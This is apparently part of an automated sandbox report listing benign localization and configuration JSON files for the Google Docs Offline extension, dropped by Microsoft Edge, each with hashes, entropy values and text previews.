                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):978
                                                                                                                                                                                                                  Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                  MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                  SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                  SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                  SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):907
                                                                                                                                                                                                                  Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                  MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                  SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                  SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                  SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                  Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                  MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                  SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                  SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                  SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):937
                                                                                                                                                                                                                  Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                  MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                  SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                  SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                  SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1337
                                                                                                                                                                                                                  Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                  MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                  SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                  SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                  SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2846
                                                                                                                                                                                                                  Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                  MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                  SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                  SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                  SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):934
                                                                                                                                                                                                                  Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                  MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                  SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                  SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                  SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):963
                                                                                                                                                                                                                  Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                  MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                  SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                  SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                  SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1320
                                                                                                                                                                                                                  Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                  MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                  SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                  SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                  SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):884
                                                                                                                                                                                                                  Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                  MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                  SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                  SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                  SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):980
                                                                                                                                                                                                                  Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                  MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                  SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                  SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                  SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wuser popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1941
                                                                                                                                                                                                                  Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                  MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                  SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                  SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                  SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1969
                                                                                                                                                                                                                  Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                  MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                  SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                  SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                  SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1674
                                                                                                                                                                                                                  Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1063
                                                                                                                                                                                                                  Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1333
                                                                                                                                                                                                                  Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1263
                                                                                                                                                                                                                  Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1074
                                                                                                                                                                                                                  Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                                                                  Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1205
                                                                                                                                                                                                                  Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):843
                                                                                                                                                                                                                  Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):912
                                                                                                                                                                                                                  Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                  MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                  SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                  SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                  SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11406
                                                                                                                                                                                                                  Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                  MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                  SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                  SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                  SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[{"description":"treehash per file","signed_content":{"payload":"
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):854
                                                                                                                                                                                                                  Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                  MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                  SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                  SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                  SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2525
                                                                                                                                                                                                                  Entropy (8bit):5.417954053901
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
